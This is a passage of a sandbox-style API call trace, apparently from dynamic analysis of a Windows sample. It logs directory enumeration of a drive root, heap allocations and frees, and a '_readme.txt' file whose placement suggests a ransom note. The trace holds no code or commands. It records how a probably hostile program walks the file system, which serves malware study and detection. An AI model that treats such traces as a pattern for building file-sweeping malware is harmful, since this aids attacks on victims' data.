hHeap=0x630000) returned 1 [0093.763] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x4e9ad440, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0093.763] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0093.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0093.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fed8 [0093.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x32b2de0 [0093.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0093.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f70 [0093.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0093.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.763] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0093.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fed8 | out: hHeap=0x630000) returned 1 [0093.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0093.764] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x4ecf3280, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0093.764] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fed8 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fed8 | out: hHeap=0x630000) returned 1 [0093.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0093.764] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xaa0e5bd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xaa0e5bd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x32b14c8 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fed8 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0093.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f70 | out: hHeap=0x630000) returned 1 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0093.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0093.765] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0093.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0093.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0093.765] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0093.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.766] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x687c78 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fdc0 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f70 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330428 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0093.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332feb0 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fed8 | out: hHeap=0x630000) returned 1 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0093.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.767] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5ee0 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0093.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5ee0 | out: hHeap=0x630000) returned 1 [0093.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f28 | out: hHeap=0x630000) returned 1 [0093.767] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ab25f00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0x9ab25f00, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x9ab25f00, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.767] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.768] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x32d0958 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fed8 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5f28 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301f8 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330888 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330748 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0093.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d5ee0 [0093.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0093.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fdc0 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d5f70 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330428 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332feb0 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0093.769] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x687c78 | out: hHeap=0x630000) returned 1 [0093.769] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0093.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.770] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16dc280, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa16dc280, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa16dc280, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.770] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa16dc280, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa16dc280, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa16dc280, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.770] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f78 [0093.770] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.770] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.770] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.771] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.771] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.772] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.772] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, 